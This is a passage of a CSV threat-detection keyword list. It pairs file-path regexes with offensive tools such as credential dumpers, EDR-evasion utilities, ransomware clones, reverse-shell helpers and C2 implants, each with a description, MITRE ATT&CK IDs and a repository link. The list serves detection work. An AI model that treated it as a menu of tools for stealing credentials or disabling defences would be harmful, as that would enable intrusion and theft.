tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5924","1287","2024-04-17T00:56:06Z","2015-03-28T12:04:33Z" "*\UAC-TokenMagic.ps1*",".{0,1000}\\UAC\-TokenMagic\.ps1.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*\uberfile.py*",".{0,1000}\\uberfile\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*\UefiShell.iso*",".{0,1000}\\UefiShell\.iso.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*\unDefender.exe*",".{0,1000}\\unDefender\.exe.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","0","N/A","10","4","321","77","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" "*\UnhookingPatch\bin2mac.py*",".{0,1000}\\UnhookingPatch\\bin2mac\.py.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","8","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*\unlock your files.lnk*",".{0,1000}\\unlock\syour\sfiles\.lnk.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*\UnmanagedPowerShell.cpp*",".{0,1000}\\UnmanagedPowerShell\.cpp.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","N/A","6","5","461","108","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z" "*\UnmanagedPowerShell.exe*",".{0,1000}\\UnmanagedPowerShell\.exe.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","N/A","6","5","461","108","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z" "*\UnmanagedPowerShell.sln*",".{0,1000}\\UnmanagedPowerShell\.sln.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","N/A","6","5","461","108","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z" "*\UnmanagedPowerShell.vcxproj*",".{0,1000}\\UnmanagedPowerShell\.vcxproj.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","N/A","6","5","461","108","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z" "*\unpackerLoadEXE.exe*",".{0,1000}\\unpackerLoadEXE\.exe.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","9","1","50","13","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z" "*\UnquotedServicePath.cs*",".{0,1000}\\UnquotedServicePath\.cs.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*\unquotedsvcpath.o*",".{0,1000}\\unquotedsvcpath\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*\URL_obfuscated.log*",".{0,1000}\\URL_obfuscated\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\usbmon.txt*",".{0,1000}\\usbmon\.txt.{0,1000}","offensive_tool_keyword","usbmon","USB capture for Linux.","T1052 - T1059 - T1090 - T1105 - T1114 - T1124 - T1497 - T1557","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://www.kernel.org/doc/Documentation/usb/usbmon.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\user_persistence_run.c*",".{0,1000}\\user_persistence_run\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*\users\public\desktop\Fix-Your-Files.txt*",".{0,1000}\\users\\public\\desktop\\Fix\-Your\-Files\.txt.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\Users\Public\DtcInstall.txt*",".{0,1000}\\Users\\Public\\DtcInstall\.txt.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*\Users\Public\nc.exe*",".{0,1000}\\Users\\Public\\nc\.exe.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","0","N/A","N/A","8","736","180","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" "*\Users\Public\revshell.exe*",".{0,1000}\\Users\\Public\\revshell\.exe.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*\users\public\sam.save*",".{0,1000}\\users\\public\\sam\.save.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","10","1","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z" "*\users\public\system.save*",".{0,1000}\\users\\public\\system\.save.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","10","1","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z" "*\Users\Public\termsrv.dll*",".{0,1000}\\Users\\Public\\termsrv\.dll.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","9","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*\Users\Public\termsrv.dll*",".{0,1000}\\Users\\Public\\termsrv\.dll.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","7","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*\Users\Public\termsrv.patch.dll*",".{0,1000}\\Users\\Public\\termsrv\.patch\.dll.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","7","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*\Users\Public\Windows\Ui*",".{0,1000}\\Users\\Public\\Windows\\Ui.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*\Users\Public\Windows\Ui\*",".{0,1000}\\Users\\Public\\Windows\\Ui\\.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*\Users_Nochangedpassword.txt*",".{0,1000}\\Users_Nochangedpassword\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*\Use-Waitfor.exe*",".{0,1000}\\Use\-Waitfor\.exe.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","9","1","55","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z" "*\UUID_bypass.py*",".{0,1000}\\UUID_bypass\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*\valid-creds.txt*",".{0,1000}\\valid\-creds\.txt.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","10","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "*\VBad.py*",".{0,1000}\\VBad\.py.{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","0","N/A","8","6","517","128","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z" "*\VDR-main.zip",".{0,1000}\\VDR\-main\.zip","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","1","N/A","10","2","160","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z" "*\veeam_dump.py*",".{0,1000}\\veeam_dump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\veeam-creds\*",".{0,1000}\\veeam\-creds\\.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/sadshade/veeam-creds","1","0","N/A","10","1","71","24","2023-01-17T13:57:27Z","2021-02-05T03:13:08Z" "*\Venom.v1.0.1.7z*",".{0,1000}\\Venom\.v1\.0\.1\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*\Venom.v1.0.2.7z*",".{0,1000}\\Venom\.v1\.0\.2\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*\Venom.v1.0.7z*",".{0,1000}\\Venom\.v1\.0\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*\Venom.v1.1.0.7z*",".{0,1000}\\Venom\.v1\.1\.0\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*\VNC\.VNC-Non-Auth.txt*",".{0,1000}\\VNC\\\.VNC\-Non\-Auth\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\vncdll.x64.dll*",".{0,1000}\\vncdll\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*\vncdll.x86.dll*",".{0,1000}\\vncdll\.x86\.dll.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*\void.log*",".{0,1000}\\void\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\Volumiser.exe*",".{0,1000}\\Volumiser\.exe.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","0","N/A","7","4","318","34","2023-05-05T14:03:14Z","2022-11-08T21:38:56Z" "*\Volumiser.sln*",".{0,1000}\\Volumiser\.sln.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","0","N/A","7","4","318","34","2023-05-05T14:03:14Z","2022-11-08T21:38:56Z" "*\Volumiser\Program.cs*",".{0,1000}\\Volumiser\\Program\.cs.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","0","N/A","7","4","318","34","2023-05-05T14:03:14Z","2022-11-08T21:38:56Z" "*\WaaSMedicPS.dll*",".{0,1000}\\WaaSMedicPS\.dll.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*\Wait_For_Command.ps1*",".{0,1000}\\Wait_For_Command\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\Waitfor-Persistence.ps1*",".{0,1000}\\Waitfor\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","9","1","55","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z" "*\Waitfor-Persistence\*",".{0,1000}\\Waitfor\-Persistence\\.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","9","1","55","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z" "*\Waitfor-Persistence-master*",".{0,1000}\\Waitfor\-Persistence\-master.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","9","1","55","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z" "*\Watson.exe*",".{0,1000}\\Watson\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\wce32.exe*",".{0,1000}\\wce32\.exe.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","8","4","N/A","N/A","N/A","N/A" "*\wce64.exe*",".{0,1000}\\wce64\.exe.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","8","4","N/A","N/A","N/A","N/A" "*\wce-beta.zip*",".{0,1000}\\wce\-beta\.zip.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" "*\wcreddump.py*",".{0,1000}\\wcreddump\.py.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","N/A","10","1","56","3","2024-04-19T17:11:22Z","2024-03-05T00:00:20Z" "*\WDExclusion.dll*",".{0,1000}\\WDExclusion\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\WDExclusion.pdb*",".{0,1000}\\WDExclusion\.pdb.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\wdextract.cpp*",".{0,1000}\\wdextract\.cpp.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*\wdextract.sln*",".{0,1000}\\wdextract\.sln.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*\wdextract.vcxproj*",".{0,1000}\\wdextract\.vcxproj.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*\wdextract32.exe*",".{0,1000}\\wdextract32\.exe.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*\wdextract64.exe*",".{0,1000}\\wdextract64\.exe.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*\wdigest.py*",".{0,1000}\\wdigest\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\WdigestOffsets.csv*",".{0,1000}\\WdigestOffsets\.csv.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*\web_delivery.py*",".{0,1000}\\web_delivery\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\webdav.py*",".{0,1000}\\webdav\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\WfpTokenDup.exe*",".{0,1000}\\WfpTokenDup\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - 